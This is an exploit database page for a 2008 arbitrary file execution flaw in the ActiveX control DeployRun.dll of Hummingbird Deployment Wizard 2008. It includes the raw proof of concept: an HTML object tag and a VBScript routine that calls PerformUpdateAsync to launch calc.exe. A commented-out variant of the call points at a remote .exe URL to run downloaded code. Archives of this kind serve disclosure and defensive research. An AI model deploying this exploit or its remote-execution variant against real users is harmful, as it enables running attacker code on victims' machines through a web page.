header-logo
Suggest Exploit
vendor:
Deployment Wizard 2008
by:
shinnai
7.5
CVSS
HIGH
Arbitrary File Execution
94
CWE
Product Name: Deployment Wizard 2008
Affected Version From: DeployRun.dll <= 10.0.0.44
Affected Version To: DeployRun.dll <= 10.0.0.44
Patch Exists: NO
Related CWE: N/A
CPE: 7F9B30F1-5129-4F5C-A76C-CE264A6C7D10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP3
2008

Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution(2)

Hummingbird Deployment Wizard 2008 (DeployRun.dll) is vulnerable to arbitrary file execution. The vulnerable method is PerformUpdateAsync (ByVal ExecAfterComplete As String). It has been tested on Windows XP Professional SP3 full patched, with Internet Explorer 7.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

--------------------------------------------------------------------------------
 Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution(2)
 url: http://www.hummingbird.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 
 Info:
 DeployRun.dll <= 10.0.0.44
 
 Marked as:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data  
 IPersist Safe:  Safe for untrusted: caller,data

 Vulnerable method:
 Sub PerformUpdateAsync (ByVal ExecAfterComplete As String)

 Tested on Windows XP Professional SP3 full patched, with Internet Explorer 7

 There are a lot of dangerous methods, just take a look and... good searching
--------------------------------------------------------------------------------
<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test' height='20' width='20'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
   test.PerformUpdateAsync "calc.exe"
   'test.PerformUpdateAsync "http://www.SomeSite.com/SomeFile.exe"
 End Sub
</script>

# milw0rm.com [2008-10-17]

Navigation

Suggest Exploit

Services By CQR